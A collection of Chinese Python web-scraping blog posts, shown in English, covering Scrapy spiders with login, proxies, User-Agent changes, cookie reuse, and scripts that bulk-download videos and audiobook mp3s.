Python crawler for every user's posts on Jisilu (集思录) — Scrapy writing into MongoDB

李魔佛 posted an article • 0 comments • 121 views • 2018-09-02 21:52

It's been a while since my last update, so here are some crawlers I built earlier. Otherwise nobody will visit at all. -. -
 
The project uses the Scrapy framework and writes the data into a MongoDB database. Crawling the whole site took about half an hour and yielded roughly 120,000 records.
 
The main code of the project:

The main spider:

# -*- coding: utf-8 -*-
import re
import logging

import scrapy
from scrapy import Request, FormRequest

from jsl.items import JslItem
from jsl import config


class AllcontentSpider(scrapy.Spider):
    name = 'allcontent'

    headers = {
        'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
        'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
        'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
        'Referer': 'https://www.jisilu.cn/login/',
        'Accept-Encoding': 'gzip,deflate,br',
        'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
    }

    def start_requests(self):
        login_url = 'https://www.jisilu.cn/login/'
        headers = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
            'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
            'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}

        yield Request(url=login_url, headers=headers, callback=self.login, dont_filter=True)

    def login(self, response):
        url = 'https://www.jisilu.cn/account/ajax/login_process/'
        data = {
            'return_url': 'https://www.jisilu.cn/',
            'user_name': config.username,
            'password': config.password,
            'net_auto_login': '1',
            '_post_type': 'ajax',
        }

        yield FormRequest(
            url=url,
            headers=self.headers,
            formdata=data,
            callback=self.parse,
            dont_filter=True
        )

    def parse(self, response):
        for i in range(1, 3726):
            focus_url = 'https://www.jisilu.cn/home/explore/sort_type-new__day-0__page-{}'.format(i)
            yield Request(url=focus_url, headers=self.headers, callback=self.parse_page, dont_filter=True)

    def parse_page(self, response):
        nodes = response.xpath('//div[@class="aw-question-list"]/div')
        for node in nodes:
            each_url = node.xpath('.//h4/a/@href').extract_first()
            yield Request(url=each_url, headers=self.headers, callback=self.parse_item, dont_filter=True)

    def parse_item(self, response):
        item = JslItem()
        title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
        s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
        ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)

        try:
            content = ret[0].strip()
        except:
            content = None

        createTime = response.xpath('//div[@class="aw-question-detail-meta"]/span/text()').extract_first()

        resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')

        url = response.url
        item['title'] = title.strip()
        item['content'] = content
        try:
            item['resp_no'] = int(resp_no)
        except Exception as e:
            logging.warning(e)
            item['resp_no'] = None

        item['createTime'] = createTime
        item['url'] = url.strip()
        resp = []
        for index, reply in enumerate(response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
            replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
            rep_content = reply.xpath(
                './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
            # print rep_content
            agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
            resp.append({replay_user.strip() + '_{}'.format(index): [int(agree), rep_content.strip()]})

        item['resp'] = resp
        yield item




The login function simulates logging in to Jisilu; the POST data can be worked out by capturing the login request with a packet sniffer.
After that it simply crawls page by page. The logic is straightforward.
 
The pipeline then writes into MongoDB:

import pymongo
from collections import OrderedDict


class JslPipeline(object):
    def __init__(self):
        self.db = pymongo.MongoClient(host='10.18.6.1', port=27017)
        # self.user = u'neo牛3'  # change to a specific username, e.g. 毛之川; the user id can be found in the profile page source, e.g. 持有封基 is 8132
        self.collection = self.db['db_parker']['jsl']

    def process_item(self, item, spider):
        self.collection.insert(OrderedDict(item))
        return item
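For the pipeline to take effect it has to be enabled in the project's settings.py. A minimal sketch, assuming the class lives in jsl/pipelines.py (that path is my assumption, not shown in the post):

ITEM_PIPELINES = {
    # the value is the pipeline's order; lower numbers run first
    'jsl.pipelines.JslPipeline': 300,
}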
The scraped data as stored in MongoDB (screenshot omitted).

Original article.
Please credit the source when reposting: http://30daydo.com/publish/article/351
 

How to use a proxy in scrapy_splash?

李魔佛 posted an article • 0 comments • 167 views • 2018-08-24 21:44

Method 1:

yield scrapy.Request(
    url=self.base_url.format(i),
    meta={'page': str(i),
          'splash': {
              'args': {
                  'images': 0,
                  'wait': 15,
                  'proxy': self.get_proxy(),
              },
              'endpoint': 'render.html',
          },
    },
)

Here get_proxy() returns a string, a proxy in a format like http://8.8.8.8:8888.
I've tested this approach myself and it works.
 
You can also make the call through SplashRequest from scrapy_splash; the arguments are the same, just positioned slightly differently, as in the sketch below.
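A minimal sketch of the SplashRequest form, assuming the same base_url and get_proxy() helper as above:

from scrapy_splash import SplashRequest

yield SplashRequest(
    url=self.base_url.format(i),
    endpoint='render.html',
    args={
        'images': 0,
        'wait': 15,
        'proxy': self.get_proxy(),  # same string format, e.g. http://8.8.8.8:8888
    },
    meta={'page': str(i)},
)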
 
Method 2 is to write a middleware, but I tried many times without success; the recipes online all feel like hot air.
The idea is to set request.meta['splash']['args']['proxy'] = xxxxxxx inside process_request.
It had no effect. Another friend I compared notes with said the same: it doesn't take effect.

If anyone has gotten it to work, feel free to message me and compare notes.

The latest way to do logging in Scrapy

李魔佛 posted an article • 0 comments • 130 views • 2018-08-15 15:01

The old way:

from scrapy import log
log.msg("This is a warning", level=log.WARNING)

Adding logs in a spider

The recommended way to log inside a spider used to be the Spider's log() method, which automatically fills in the spider argument when scrapy.log.start() is called.

Other arguments are passed straight through to the msg() method.

 

The scrapy.log module: scrapy.log.start(logfile=None, loglevel=None, logstdout=None) starts the logging facility. It must be called before anything is logged; messages logged before the call are lost.

But running this produces a warning:

[py.warnings] WARNING: E:\git\CrawlMan\bilibili\bilibili\spiders\bili.py:14: ScrapyDeprecationWarning: log.msg has been deprecated, create a python logger and log through it instead
log.msg

So log.msg has officially been deprecated.


The latest usage:

# -*- coding: utf-8 -*-
import logging

import scrapy
from scrapy_splash import SplashRequest
# from scrapy import log


class BiliSpider(scrapy.Spider):
    name = 'ordinary'  # this is the name you pass to scrapy crawl to launch the spider
    allowed_domains = ["bilibili.com"]
    start_urls = [
        "https://www.bilibili.com/"
    ]

    def parse(self, response):
        logging.info('====================================================')
        content = response.xpath("//div[@class='num-wrap']").extract_first()
        logging.info(content)
        logging.info('====================================================')
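Alternatively, Scrapy attaches a ready-made logger to every spider, so inside spider methods you can skip the logging import entirely:

    def parse(self, response):
        # self.logger is a standard logging.Logger named after the spider
        self.logger.info('crawled %s', response.url)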

Want to write a py script that scrapes lottery draw results and predicts the next draw

李魔佛 replied to the question • 2 followers • 1 reply • 185 views • 2018-08-10 00:22

The latest Chrome no longer supports InfoLite

李魔佛 posted an article • 0 comments • 219 views • 2018-06-25 18:58

After updating to v67, InfoLite simply vanished. Ugh.
Had to downgrade......

Version 65.0.3325.162 (Official Build) (64-bit)
is the newest version that still supports InfoLite.
 
 

Message: invalid selector: Compound class names not permitted

李魔佛 posted an article • 0 comments • 718 views • 2018-01-30 00:59

When using Selenium, if you look up an element by class name, e.g.

driver.find_element_by_class_name("content")

and the class attribute actually holds several space-separated classes, you hit this error:

Message: invalid selector: Compound class names not permitted
 
For example, in JD.com's login page:

<div id="content">
    <div class="login-wrap">
        <div class="w">
            <div class="login-form">
                <div class="login-tab login-tab-l">
                    <a href="javascript:void(0)" clstag="pageclick|keycount|201607144|1"> 扫码登录</a>
                </div>
                <div class="login-tab login-tab-r">
                    <a href="javascript:void(0)" clstag="pageclick|keycount|201607144|2">账户登录</a>
                </div>
                <div class="login-box">
                    <div class="mt tab-h">
                    </div>
                    <div class="msg-wrap">
                        <div class="msg-error hide"><b></b></div>
                    </div>

What I want to find is <div class="login-tab login-tab-l">.

So a CSS selector should be used instead (the spaces in the class become dots):

browser.find_element_by_css_selector('div.login-tab.login-tab-l')
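For reference, an equivalent lookup with XPath also avoids the compound-class problem; this one-liner is my own addition, not from the original post:

browser.find_element_by_xpath('//div[contains(@class, "login-tab-l")]')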

Python simulated login to vexx.pro: fetch your total assets/coin balances and other account info

李魔佛 posted an article • 0 comments • 887 views • 2018-01-10 03:22

Every time I log in to vexx.pro, the first captcha is rejected as wrong even when it's correct, so I end up typing two captchas per login. To save some time, I wrote a Python program that simulates the login and fetches my account info automatically.
 



# -*-coding=utf-8-*-

import requests

session = requests.Session()
user = ''
password = ''

def getCode():
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'}
    url = 'http://vexx.pro/verify/code.html'
    s = session.get(url=url, headers=headers)

    # save the captcha image locally, then type it in by hand
    with open('code.png', 'wb') as f:
        f.write(s.content)

    code = raw_input('input the code: ')
    print 'code is ', code

    login_url = 'http://vexx.pro/login/up_login.html'
    post_data = {
        'moble': user,
        'mobles': '+86',
        'password': password,
        'verify': code,
        'login_token': ''}

    login_s = session.post(url=login_url, headers=headers, data=post_data)
    print login_s.status_code

    zzc_url = 'http://vexx.pro/ajax/check_zzc/'
    zzc_s = session.get(url=zzc_url, headers=headers)
    print zzc_s.text

def main():
    getCode()

if __name__ == '__main__':
    main()



Fill in your own username and password; you'll type the captcha once along the way.
You can save the session locally so you don't have to enter the password next time.
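A minimal sketch of saving the session cookies to disk with pickle (my own addition; the file name is arbitrary):

import pickle
import requests

# after a successful login, dump the cookie jar:
with open('cookies.pkl', 'wb') as f:
    pickle.dump(requests.utils.dict_from_cookiejar(session.cookies), f)

# on the next run, restore it into a fresh session:
session = requests.Session()
with open('cookies.pkl', 'rb') as f:
    session.cookies = requests.utils.cookiejar_from_dict(pickle.load(f))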
 
Postscript: a few months later this site was confirmed to be an exit scam and can no longer be logged into. I hope nobody else gets taken in.
Original article: http://30daydo.com/article/263
Please credit the source when reposting.

[scrapy] Several ways to change a crawler's default User-Agent

李魔佛 posted an article • 0 comments • 1914 views • 2017-12-14 16:22

1. Create the Scrapy project:

scrapy startproject headerchange

2. Create the spider file:

scrapy genspider headervalidation helloacm.com

3. Target site:

https://helloacm.com/api/user-agent/

This site simply echoes back the caller's User-Agent, so you can directly check whether yours was set successfully.
Try opening
https://helloacm.com/api/user-agent/
in a browser; the site returns:
"Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.3202.94 Safari\/537.36"
 
4. Configure Scrapy
Change headervalidation.py in the spiders folder to the following:

class HeadervalidationSpider(scrapy.Spider):
    name = 'headervalidation'
    allowed_domains = ['helloacm.com']
    start_urls = ['http://helloacm.com/api/user-agent/']

    def parse(self, response):
        print '*'*20
        print response.body
        print '*'*20

The project just prints the response body, i.e. the User-Agent the site saw.
 
Run:

scrapy crawl headervalidation

and you'll find it returns a 503. Next, let's change Scrapy's User-Agent.

Method 1:
Change USER_AGENT in settings.py:

# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Hello World'

Then re-run

scrapy crawl headervalidation

and this time you can see normal Scrapy output:

2017-12-14 16:17:35 [scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023
2017-12-14 16:17:35 [scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (301) to <GET https://helloacm.com/api/us
er-agent/> from <GET http://helloacm.com/api/user-agent/>
2017-12-14 16:17:36 [scrapy.core.engine] DEBUG: Crawled (200) <GET https://helloacm.com/api/user-agent/> (referer: None)

********************
"Hello World"
********************
2017-12-14 16:17:37 [scrapy.core.engine] INFO: Closing spider (finished)
2017-12-14 16:17:37 [scrapy.statscollectors] INFO: Dumping Scrapy stats:
{'downloader/request_bytes': 406,
'downloader/request_count': 2,
'downloader/request_method_count/GET': 2,
'downloader/response_bytes': 796,
'downloader/response_count': 2,
'downloader/response_status_count/200': 1,
'downloader/response_status_count/301': 1,
'finish_reason': 'finished',
'finish_time': datetime.datetime(2017, 12, 14, 8, 17, 37, 29000),
'log_count/DEBUG': 3,
'log_count/INFO': 7,
'response_received_count': 1,
'scheduler/dequeued': 2,
'scheduler/dequeued/memory': 2,
'scheduler/enqueued': 2,
'scheduler/enqueued/memory': 2,
'start_time': datetime.datetime(2017, 12, 14, 8, 17, 35, 137000)}
2017-12-14 16:17:37 [scrapy.core.engine] INFO: Spider closed (finished)
 
The User-Agent is now set correctly.
 
Method 2:
Change DEFAULT_REQUEST_HEADERS in settings.py:

# Override the default request headers:
DEFAULT_REQUEST_HEADERS = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en',
    'User-Agent': 'Hello World'
}

Running again shows the same output as above.
 
 
Method 3:
Set it in code:

class HeadervalidationSpider(scrapy.Spider):
    name = 'headervalidation'
    allowed_domains = ['helloacm.com']

    def start_requests(self):
        header = {'User-Agent': 'Hello World'}
        yield scrapy.Request(url='http://helloacm.com/api/user-agent/', headers=header)

    def parse(self, response):
        print '*'*20
        print response.body
        print '*'*20

Running this also shows the output below:

2017-12-14 16:17:35 [scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023
2017-12-14 16:17:35 [scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (301) to <GET https://helloacm.com/api/us
er-agent/> from <GET http://helloacm.com/api/user-agent/>
2017-12-14 16:17:36 [scrapy.core.engine] DEBUG: Crawled (200) <GET https://helloacm.com/api/user-agent/> (referer: None)

********************
"Hello World"
********************
2017-12-14 16:17:37 [scrapy.core.engine] INFO: Closing spider (finished)
2017-12-14 16:17:37 [scrapy.statscollectors] INFO: Dumping Scrapy stats:
 
Method 4:
Customize the header in a middleware.

Add a directory under the project root, e.g. customerMiddleware, and create a custom middleware file in it; the file name is arbitrary, say customMiddleware.py.

The file's content changes the request's User-Agent:

#-*-coding=utf-8-*-
from scrapy.contrib.downloadermiddleware.useragent import UserAgentMiddleware

class CustomerUserAgent(UserAgentMiddleware):
    def process_request(self, request, spider):
        ua = 'HELLO World?????????'
        request.headers.setdefault('User-Agent', ua)

Add the following to settings.py so the middleware takes effect:

DOWNLOADER_MIDDLEWARES = {
    'headerchange.customerMiddleware.customMiddleware.CustomerUserAgent': 10
    # 'headerchange.middlewares.MyCustomDownloaderMiddleware': 543,
}
Re-run, and you get exactly the same result.
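Building on method 4, a natural extension is to pick a random User-Agent per request. This is my own sketch, not part of the original post, and the UA pool here is illustrative:

#-*-coding=utf-8-*-
import random

from scrapy.contrib.downloadermiddleware.useragent import UserAgentMiddleware

UA_POOL = [
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
]

class RandomUserAgent(UserAgentMiddleware):
    def process_request(self, request, spider):
        # overwrite (rather than setdefault) so every request gets a fresh UA
        request.headers['User-Agent'] = random.choice(UA_POOL)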
 
Original article; please credit when reposting: http://30daydo.com/article/245

GitHub source: https://github.com/Rockyzsu/base_function/tree/master/scrapy_demo/headerchange
Stars and likes welcome.

(donation QR code omitted)

If you find the article useful, feel free to tip as your mood takes you, to help cover the site's server and bandwidth costs.
Your support is my biggest motivation!

PS: thanks to the following friends for their tips:
A Keung
阿贾克斯
白驹过隙
Che Long

Ergeduoduo (儿歌多多): download all the nursery-rhyme video files

李魔佛 posted an article • 0 comments • 1425 views • 2017-09-28 23:44

I'll implement this feature when I have time:
sniff the app's download path, then grab the data.

http://30daydo.com/article/236

Update ******** 2018-01-09 *************
I only just remembered I dug this hole a while ago; time to fill it.

Ergeduoduo's full run is also up on iQiyi, so the goal becomes scraping the Ergeduoduo video list from iqiyi.
There's a ready-made third-party library on GitHub for downloading from iQiyi, and it can be driven from Python.

The code is written for Python 3.
 
1. Open the page http://www.iqiyi.com/v_19rrkwcx6w.html#curid=455603300_26b870cbb10342a6b8a90f7f0b225685

This is episode 1 of Ergeduoduo; the curid at the end of the url is just a random string and can be dropped:

url = "http://www.iqiyi.com/v_19rrkwcx6w.html"

View the page source in a browser; it directly contains the video urls for episodes 1-30, so the job is to extract those 30 urls.
 
First fetch the page content:

session = requests.Session()

def getContent(url):
    try:
        ret = session.get(url)
    except:
        return None
    if ret.status_code == 200:
        return ret.text
    else:
        return None
Then extract the urls from the content (screenshot url.GIF omitted).

Take the div whose attribute data-current-count is 1, select its li child nodes, and pull the href from each li's a tag:

    content = getContent(url)
    root = etree.HTML(content)
    elements = root.xpath('//div[@data-current-count="1"]//li/a/@href')
    for items in elements:
        song_url = items.replace('//', '')
        song_url = song_url.strip()
        print(song_url)





2. With the urls in hand, the videos on the page can be downloaded.
Here I use a third-party video download library, you-get. (Very handy; I forked it into my own repo to study: https://github.com/Rockyzsu/you-get)

Usage:

python you-get -d --format=HD url

you-get needs an ffmpeg.exe binary to decode the video stream; it's a free download from the official site.

url is the address you want to download; format selects HD or another quality — I chose HD.

To call one Python script from another, use subprocess:

        p = subprocess.Popen('python you-get -d --format=HD {}'.format(song_url), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
        output, error = p.communicate()
        print(output)
        print(error)
        p.wait()

The song_url here carries on from the code above.
 
 
The complete code:

#-*-coding=utf-8-*-
import requests
from lxml import etree
import subprocess

session = requests.Session()

def getContent(url):
    # url='http://www.iqiyi.com/v_19rrkwcx6w.html'
    try:
        ret = session.get(url)
    # except Exception,e:
    except:
        # print e
        return None
    if ret.status_code == 200:
        return ret.text
    else:
        return None

def getUrl():
    url = 'http://www.iqiyi.com/v_19rrkwcx6w.html'
    url2 = 'http://www.iqiyi.com/v_19rrl2td7g.html'  # episodes 31-60
    content = getContent(url)
    root = etree.HTML(content)
    elements = root.xpath('//div[@data-current-count="1"]//li/a/@href')
    for items in elements:
        song_url = items.replace('//', '')
        song_url = song_url.strip()
        print(song_url)
        p = subprocess.Popen('python you-get -d --format=HD {}'.format(song_url), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
        output, error = p.communicate()
        print(output)
        print(error)
        p.wait()

def main():
    getUrl()

if __name__ == '__main__':
    main()
That covers episodes 1-30; the full run is now 120 episodes. Episodes 31-60 are at
http://www.iqiyi.com/v_19rrl2td7g.html

This url changes automatically as you click through the right-hand sidebar on the iQiyi page. In the same way you can find the urls for 61-120, then swap them into the first url in the code above. (With so few pages I didn't bother with a loop — see the sketch below for one way to do it.)
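A loop over all the list pages might look like this; it's my own sketch, and the 61-120 urls are placeholders to fill in from the sidebar:

page_urls = [
    'http://www.iqiyi.com/v_19rrkwcx6w.html',  # episodes 1-30
    'http://www.iqiyi.com/v_19rrl2td7g.html',  # episodes 31-60
    # append the 61-90 and 91-120 page urls here
]
for page_url in page_urls:
    content = getContent(page_url)
    root = etree.HTML(content)
    for href in root.xpath('//div[@data-current-count="1"]//li/a/@href'):
        print(href.replace('//', '').strip())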
 
Final download results (screenshot ergeduoduo.GIF omitted).
 
Later I tweaked the code to check whether a file already exists and skip it if so. That matters when downloading 100-odd files over a long stretch: if you get disconnected, a re-run won't re-download what's already finished.
 
#-*-coding=utf-8-*-
import sys, os
import requests
from lxml import etree
import subprocess

session = requests.Session()

def getContent(url):
    # url='http://www.iqiyi.com/v_19rrkwcx6w.html'
    try:
        ret = requests.get(url)
        ret.encoding = 'utf-8'
    # except Exception,e:
    except:
        # print e
        return None
    if ret.status_code == 200:
        return ret.text
    else:
        return None

def getUrl():
    url = 'http://www.iqiyi.com/v_19rrkwcx6w.html'
    url2 = 'http://www.iqiyi.com/v_19rrl2td7g.html'  # episodes 31-60
    content = getContent(url)
    if not content:
        print "network issue, retry"
        exit(0)
    root = etree.HTML(content, parser=etree.HTMLParser(encoding='utf-8'))
    elements = root.xpath('//div[@data-current-count="1"]//li')
    for items in elements:
        url_item = items.xpath('.//a/@href')[0]
        song_url = url_item.replace('//', '')
        song_url = song_url.strip()
        print(song_url)
        # name=items.xpath('.//span[@class="item-num"]/text()')[0]
        name = items.xpath('.//span[@class="item-num"]/text()')[0].encode('utf-8').strip() + \
               ' ' + items.xpath('.//span[@class="item-txt"]/text()')[0].encode('utf-8').strip() + '.mp4'
        name = '儿歌多多 ' + name
        name = name.decode('utf-8')
        filename = os.path.join(os.getcwd(), name)
        print filename
        # skip files that were already downloaded
        if os.path.exists(filename):
            continue
        p = subprocess.Popen('python you-get -d --format=HD {}'.format(song_url), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
        output, error = p.communicate()
        print(output)
        print(error)
        p.wait()


def main():
    getUrl()

if __name__ == '__main__':
    main()
 

PS: I was downloading while writing this post, which is why only a few are done so far.

Original article: http://30daydo.com/article/236
Please credit the source when reposting.
 

Batch-download Lanren Tingshu (懒人听书) mp3 files

李魔佛 posted an article • 3 comments • 4932 views • 2017-09-14 01:09

Lanren Tingshu is a decent online audiobook site; I've been listening in the browser lately and wanted to get the audio files onto my phone for spare moments. The web version, however, offers no download function (screenshot omitted).

You can only download after installing the app.
 
Even with the app installed you can only download one track at a time, so I figured I'd grab all the audio in one go.

The method is simple and the code is short; you'll be able to follow it.

I'll use the audio of the show 财经郎眼 as the example; other shows work much the same way.
 
Open the page in a browser:
http://www.lrts.me/book/32551

Press F12 to open the debug console (I use Chrome).

At the bottom of the page there's a next-page button; click it and watch each page's url, and you'll find the concrete next-page url.
(to be continued)
 
 
The Python code:

# coding: utf-8
# http://30daydo.com
import urllib

import os
import requests
import time
from lxml import etree
from header_toolkit import getheader


def spider():
    curr = os.getcwd()
    target_dir = os.path.join(curr, 'data')
    if not os.path.exists(target_dir):
        os.mkdir(target_dir)
    for i in range(1, 100, 10):
        url = 'http://www.lrts.me/ajax/playlist/2/32551/%d' % i
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'}
        s = requests.get(url=url, headers=headers)
        tree = etree.HTML(s.text)
        nodes = tree.xpath('//*[starts-with(@class,"clearfix section-item section")]')
        print len(nodes)
        for node in nodes:
            filename = node.xpath('.//div[@class="column1 nowrap"]/span/text()')[0]
            link = node.xpath('.//input[@name="source" and @type="hidden"]/@value')[0]

            print link
            post_fix = link.split('.')[-1]
            full_path = filename + '.' + post_fix
            urllib.urlretrieve(link, filename=os.path.join(target_dir, full_path))
            time.sleep(1)


if __name__ == '__main__':
    spider()

The scraped content (screenshot 懒人听书.PNG omitted).

How to tell whether the proxy you're using is highly anonymous or transparent

李魔佛 posted an article • 0 comments • 1140 views • 2017-09-06 20:42

First, what highly anonymous and transparent proxies are.

If you go on QQ through a transparent proxy, the other side can still see your real IP; only anonymous and highly anonymous proxies keep your IP hidden.

In more detail, by how well they conceal the user, proxies fall into three classes: highly anonymous, ordinarily anonymous, and transparent.

(1) A highly anonymous proxy does not alter the client's request, so to the server it looks like a real browser is visiting. Your real IP stays hidden and the server doesn't realize a proxy is in use.

(2) An ordinarily anonymous proxy hides your real IP but alters the request, so the server may realize a proxy is in use. The visited site can't learn your ip address, but it can tell you're behind a proxy, and some ip-sniffing pages may still uncover your ip.

(3) A transparent proxy not only alters the request but also passes along your real IP address.

From most to least concealing: highly anonymous, then ordinarily anonymous, then transparent.
 
 
Set the proxy iP you've found in your browser; how to do that is easy to look up on Baidu or Google.

Then open this site in the browser:

http://members.3322.org/dyndns/getip

The response is minimal: just your current iP address. Of all the IP-checking sites I've used so far, this one is the most accurate.

Open the site through your proxy. If it shows your proxy's IP, your proxy is highly anonymous.
If it shows 2 ips, your proxy is transparent: the first ip is your original one and the second is the proxy's.
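The same check can be scripted with requests; a minimal sketch (my own addition, and the proxy address is a placeholder):

import requests

proxies = {'http': 'http://8.8.8.8:8888'}  # put your proxy here
resp = requests.get('http://members.3322.org/dyndns/getip',
                    proxies=proxies, timeout=10)
# one IP (the proxy's) -> highly anonymous; your real IP showing up too -> transparent
print(resp.text)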
(screenshot ip代理.PNG omitted)


Converting lxml.etree._ElementUnicodeResult to a string

李魔佛 posted an article • 0 comments • 4607 views • 2017-08-14 15:57

While crawling, I use lxml's xpath to pull out the fields I need:

address = each.xpath('.//address/text()')[0].strip()

But whenever address is concatenated with an ordinary string, this keeps popping up:

UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 0: ordinal not in range(128)

This is mostly down to Python 2's painful encoding handling.
 
The fix, per lxml's official docs (http://lxml.de/api/lxml.etree._ElementUnicodeResult-class.html):

object --+
         |
    basestring --+
                 |
        unicode --+
                  |
            _ElementUnicodeResult

_ElementUnicodeResult is a subclass of unicode.

So it can be used as unicode directly, and

address.encode('utf-8')

does the trick.
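Put together, a minimal Python 2 sketch of the failing and working versions (my own example, not from the post):

# -*- coding: utf-8 -*-
from lxml import etree

root = etree.HTML('<div><address>深圳</address></div>')
address = root.xpath('//address/text()')[0]   # _ElementUnicodeResult (a unicode subclass)
# print '地址:' + address                     # raises UnicodeDecodeError under Python 2
print '地址:' + address.encode('utf-8')       # works: both sides are utf-8 byte strings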

A crawler to fetch a CSDN user's rank

李魔佛 posted an article • 5 comments • 1293 views • 2017-05-17 12:40

http://30daydo.com/article/185

This is a very simple crawler script. I have it run once a week, so I can track my account's weekly rank. The data can also be plotted as a curve, which makes the weekly rank changes easy to see at a glance.

The Python code:

# Get your rank on csdn
'''
http://30daydo.com
contact: weigesysu@qq.com
'''
import urllib2, re
import time

link = 'http://blog.csdn.net/用户名/article/details/52858314'
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
header = {"User-Agent": user_agent}
req = urllib2.Request(link, headers=header)
resp = urllib2.urlopen(req)
content = resp.read()
# print content
p = re.compile(r'<li>排名:<span>第(\d+)名</span></li>')
result = p.findall(content)
print result[0]

today = time.strftime("%Y-%m-%d")
print today

f = open("data/csdn_range.txt", 'a')
contents = today + '\t' + result[0] + '\n'
f.write(contents)
f.close()
Just change 用户名 in the code to your own CSDN username.
Then schedule it to run once a week on Linux or Windows, and the program keeps appending the record to the csdn_range.txt file.

requests: reusing default cookies

李魔佛 posted an article • 0 comments • 928 views • 2017-03-17 01:41

Some sites require cookie information as an anti-crawler measure: the cookies field in the header must not be empty.
With the requests library, you can initialize the cookies once and every later request in the session keeps using them:

session = requests.session()
# first create a session

s = session.get('http://xueqiu.com', headers=self.headers)
# make one ordinary visit to xueqiu; the session now carries xueqiu's cookies

url = 'https://xueqiu.com/snowmart/push/stocks.json?product_id=19&page=3&count=5'
headers['Referer'] = 'https://xueqiu.com/strategy/19'
headers['X-Requested-With'] = 'XMLHttpRequest'
headers['DNT'] = '1'

data = {'product_id': 19, 'page': 3, 'count': 5}

resp = session.get(url, headers=self.headers, params=data).text
# if you used requests.get here instead, you would not get the correct content back
print resp

Note that the first visit,

s = session.get('http://xueqiu.com', headers=self.headers)  # an ordinary visit that seeds the session with xueqiu's cookies

is required; without that one normal visit, the cookies are never saved for subsequent use.
 
 
Update 2017-3-28
Generally, unless you need a job that runs every day or you're cracking someone's password, you don't have to bother with the login flow at all: just copy your own account's cookie string from the browser into the request header, and access works fine.

Which also means that once someone else gets hold of your cookie, they can craft requests and pull your account's information. (The cookie doesn't seem tied to your hardware: I've used the same cookie on several machines to access my logged-in account without problems.)
 
An example:

def csdn():
    session = requests.session()
    header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36'}
    url = 'http://msg.csdn.net/'
